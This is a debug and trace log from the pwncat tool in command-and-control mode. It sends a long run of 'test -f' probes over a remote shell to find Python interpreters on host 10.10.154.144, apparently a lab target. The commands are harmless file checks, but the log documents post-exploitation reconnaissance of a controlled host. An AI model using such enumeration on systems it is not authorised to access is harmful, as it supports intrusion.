2020-06-12 15:46:45,275 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,275 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python2 && echo /usr/local/python/bin/python2 || echo;\n'
2020-06-12 15:46:45,275 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,304 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,304 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python2.7
2020-06-12 15:46:45,304 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,304 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python2.7 && echo /usr/local/python/bin/python2.7 || echo;\n'
2020-06-12 15:46:45,304 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,330 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,330 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3
2020-06-12 15:46:45,330 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,330 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3 && echo /usr/local/python/bin/python3 || echo;\n'
2020-06-12 15:46:45,330 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,357 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,357 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.5
2020-06-12 15:46:45,357 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,357 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.5 && echo /usr/local/python/bin/python3.5 || echo;\n'
2020-06-12 15:46:45,357 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,383 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,383 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.6
2020-06-12 15:46:45,383 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,384 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.6 && echo /usr/local/python/bin/python3.6 || echo;\n'
2020-06-12 15:46:45,384 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,411 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,411 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.7
2020-06-12 15:46:45,411 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,411 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.7 && echo /usr/local/python/bin/python3.7 || echo;\n'
2020-06-12 15:46:45,411 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,439 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,439 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python/bin/python3.8
2020-06-12 15:46:45,439 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,439 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python/bin/python3.8 && echo /usr/local/python/bin/python3.8 || echo;\n'
2020-06-12 15:46:45,439 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,465 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,465 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python
2020-06-12 15:46:45,465 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,465 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python && echo /usr/local/python2/bin/python || echo;\n'
2020-06-12 15:46:45,465 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,493 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,493 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python2
2020-06-12 15:46:45,493 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,493 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python2 && echo /usr/local/python2/bin/python2 || echo;\n'
2020-06-12 15:46:45,493 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,521 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,522 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python2.7
2020-06-12 15:46:45,522 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,522 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python2.7 && echo /usr/local/python2/bin/python2.7 || echo;\n'
2020-06-12 15:46:45,522 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,557 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,557 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3
2020-06-12 15:46:45,557 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,557 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3 && echo /usr/local/python2/bin/python3 || echo;\n'
2020-06-12 15:46:45,557 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,583 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,583 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.5
2020-06-12 15:46:45,583 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,583 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.5 && echo /usr/local/python2/bin/python3.5 || echo;\n'
2020-06-12 15:46:45,583 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,610 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,610 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.6
2020-06-12 15:46:45,610 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,610 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.6 && echo /usr/local/python2/bin/python3.6 || echo;\n'
2020-06-12 15:46:45,610 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,636 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,636 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.7
2020-06-12 15:46:45,637 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,637 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.7 && echo /usr/local/python2/bin/python3.7 || echo;\n'
2020-06-12 15:46:45,637 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,664 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,665 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2/bin/python3.8
2020-06-12 15:46:45,665 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,665 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2/bin/python3.8 && echo /usr/local/python2/bin/python3.8 || echo;\n'
2020-06-12 15:46:45,665 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,690 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,691 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python
2020-06-12 15:46:45,691 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,691 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python && echo /usr/local/python2.7/bin/python || echo;\n'
2020-06-12 15:46:45,691 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,722 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,722 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python2
2020-06-12 15:46:45,722 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,722 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python2 && echo /usr/local/python2.7/bin/python2 || echo;\n'
2020-06-12 15:46:45,722 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,749 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,749 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python2.7
2020-06-12 15:46:45,749 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,749 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python2.7 && echo /usr/local/python2.7/bin/python2.7 || echo;\n'
2020-06-12 15:46:45,749 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,775 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,775 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3
2020-06-12 15:46:45,775 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,776 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3 && echo /usr/local/python2.7/bin/python3 || echo;\n'
2020-06-12 15:46:45,776 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,802 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,802 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.5
2020-06-12 15:46:45,802 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,802 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.5 && echo /usr/local/python2.7/bin/python3.5 || echo;\n'
2020-06-12 15:46:45,803 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,829 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,829 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.6
2020-06-12 15:46:45,829 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,829 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.6 && echo /usr/local/python2.7/bin/python3.6 || echo;\n'
2020-06-12 15:46:45,829 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,854 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,854 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.7
2020-06-12 15:46:45,854 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,854 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.7 && echo /usr/local/python2.7/bin/python3.7 || echo;\n'
2020-06-12 15:46:45,854 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,880 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,880 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python2.7/bin/python3.8
2020-06-12 15:46:45,880 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,880 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python2.7/bin/python3.8 && echo /usr/local/python2.7/bin/python3.8 || echo;\n'
2020-06-12 15:46:45,880 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,906 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,906 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python
2020-06-12 15:46:45,906 DEBUG [MainThread] 1803:send(): Trying to send 85 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,906 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python && echo /usr/local/python3/bin/python || echo;\n'
2020-06-12 15:46:45,906 DEBUG [MainThread] 1826:send(): Sent 85 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,933 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,934 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python2
2020-06-12 15:46:45,934 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,934 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python2 && echo /usr/local/python3/bin/python2 || echo;\n'
2020-06-12 15:46:45,934 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,962 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,963 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python2.7
2020-06-12 15:46:45,963 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,963 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python2.7 && echo /usr/local/python3/bin/python2.7 || echo;\n'
2020-06-12 15:46:45,963 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:45,989 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:45,989 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3
2020-06-12 15:46:45,989 DEBUG [MainThread] 1803:send(): Trying to send 87 bytes to 10.10.154.144:34498
2020-06-12 15:46:45,990 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3 && echo /usr/local/python3/bin/python3 || echo;\n'
2020-06-12 15:46:45,990 DEBUG [MainThread] 1826:send(): Sent 87 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,018 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,019 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.5
2020-06-12 15:46:46,020 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,021 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.5 && echo /usr/local/python3/bin/python3.5 || echo;\n'
2020-06-12 15:46:46,021 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,044 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,044 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.6
2020-06-12 15:46:46,044 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,044 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.6 && echo /usr/local/python3/bin/python3.6 || echo;\n'
2020-06-12 15:46:46,044 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,080 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,080 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.7
2020-06-12 15:46:46,080 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,080 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.7 && echo /usr/local/python3/bin/python3.7 || echo;\n'
2020-06-12 15:46:46,080 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,106 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,106 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3/bin/python3.8
2020-06-12 15:46:46,106 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,107 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3/bin/python3.8 && echo /usr/local/python3/bin/python3.8 || echo;\n'
2020-06-12 15:46:46,107 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,145 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,145 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python
2020-06-12 15:46:46,145 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,145 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python && echo /usr/local/python3.5/bin/python || echo;\n'
2020-06-12 15:46:46,145 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,172 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,172 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python2
2020-06-12 15:46:46,173 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,173 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python2 && echo /usr/local/python3.5/bin/python2 || echo;\n'
2020-06-12 15:46:46,173 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,200 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,201 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python2.7
2020-06-12 15:46:46,202 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,202 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python2.7 && echo /usr/local/python3.5/bin/python2.7 || echo;\n'
2020-06-12 15:46:46,202 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,227 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,228 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3
2020-06-12 15:46:46,228 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,228 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3 && echo /usr/local/python3.5/bin/python3 || echo;\n'
2020-06-12 15:46:46,228 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,263 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,263 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.5
2020-06-12 15:46:46,263 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,263 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.5 && echo /usr/local/python3.5/bin/python3.5 || echo;\n'
2020-06-12 15:46:46,263 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,289 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,289 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.6
2020-06-12 15:46:46,289 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,289 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.6 && echo /usr/local/python3.5/bin/python3.6 || echo;\n'
2020-06-12 15:46:46,289 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,451 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,451 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.7
2020-06-12 15:46:46,451 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,451 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.7 && echo /usr/local/python3.5/bin/python3.7 || echo;\n'
2020-06-12 15:46:46,451 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,763 DEBUG [MainThread] 1938:receive(): Received 6 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,763 TRACE [MainThread] 1944:receive(): Received: '\n$ \n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.5/bin/python3.8
2020-06-12 15:46:46,763 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,763 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.5/bin/python3.8 && echo /usr/local/python3.5/bin/python3.8 || echo;\n'
2020-06-12 15:46:46,763 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,891 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,891 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python
2020-06-12 15:46:46,891 DEBUG [MainThread] 1803:send(): Trying to send 89 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,891 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python && echo /usr/local/python3.6/bin/python || echo;\n'
2020-06-12 15:46:46,891 DEBUG [MainThread] 1826:send(): Sent 89 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,917 DEBUG [MainThread] 1938:receive(): Received 1 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,917 TRACE [MainThread] 1944:receive(): Received: '\n'
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python2
2020-06-12 15:46:46,917 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,917 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python2 && echo /usr/local/python3.6/bin/python2 || echo;\n'
2020-06-12 15:46:46,917 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,944 DEBUG [MainThread] 1938:receive(): Received 2 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,945 TRACE [MainThread] 1944:receive(): Received: '$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python2.7
2020-06-12 15:46:46,945 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,945 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python2.7 && echo /usr/local/python3.6/bin/python2.7 || echo;\n'
2020-06-12 15:46:46,945 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,971 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,971 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3
2020-06-12 15:46:46,971 DEBUG [MainThread] 1803:send(): Trying to send 91 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,971 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3 && echo /usr/local/python3.6/bin/python3 || echo;\n'
2020-06-12 15:46:46,971 DEBUG [MainThread] 1826:send(): Sent 91 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:46,997 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:46,997 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /usr/local/python3.6/bin/python3.5
2020-06-12 15:46:46,997 DEBUG [MainThread] 1803:send(): Trying to send 95 bytes to 10.10.154.144:34498
2020-06-12 15:46:46,997 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /usr/local/python3.6/bin/python3.5 && echo /usr/local/python3.6/bin/python3.5 || echo;\n'
2020-06-12 15:46:46,997 DEBUG [MainThread] 1826:send(): Sent 95 bytes to 10.10.154.144:34498 (0 bytes remaining)
2020-06-12 15:46:47,024 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.154.144:34498
2020-06-12 15:46:47,024 TRACE [MainThread] 1944:receive(): Received: '\n$ '
